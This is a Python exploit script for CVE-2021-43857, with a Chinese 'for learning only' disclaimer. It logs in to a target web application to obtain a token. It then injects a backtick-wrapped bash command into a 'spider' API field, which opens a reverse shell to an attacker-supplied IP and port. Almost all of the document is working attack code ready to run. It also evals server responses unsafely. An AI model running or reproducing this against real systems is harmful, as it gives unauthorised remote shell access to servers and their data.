#!/bin/python3 # coding:utf-8 # Author:lowkey0808 import sys import requests import argparse import pyfiglet print(pyfiglet.figlet_format('cve-2021-43857')) print(''' 免责声明: 脚本仅供学习参考,请勿恶意攻击他人网站, 如违法乱纪,造成一切后果由使用者自行承担 技术无罪,与作者无关 使用脚本默认同意以上说明! --Author:lowkey0808 ''') def main(): try: parser = argparse.ArgumentParser(description='cve-2021-43857', argument_default='', usage='') parser.add_argument('-u', help='url', metavar='') parser.add_argument('-U', help='登录用户', metavar='') parser.add_argument('-P', help='登录密码', metavar='') parser.add_argument('-r', help='反弹shellIP', metavar='') parser.add_argument('-p', help='反弹端口', metavar='') argv = parser.parse_args() url = argv.u username = argv.U password = argv.P ip = argv.r port = argv.p # 获得token u1 = url + "/api/user/auth" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Origin": "%s" % url, "Connection": "close", "Referer": "%s" % url} burp0_json = {"password": "%s" % password, "username": "%s" % username} token = eval(requests.post(u1, headers=burp0_headers, json=burp0_json).text) token = 'Token ' + token["token"] print(token) # getshell u2 = url + '/api/project/robots/parse' burp1_headers = {"User-Agent": "python-requests/2.20.1", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "keep-alive", "Authorization": "%s" % token} burp1_json = {"spider": "`/bin/bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'`" % (ip, port)} print(burp1_json) requests.post(u2, headers=burp1_headers, json=burp1_json, timeout=2) except Exception as e: sys.exit() if __name__ == "__main__": main()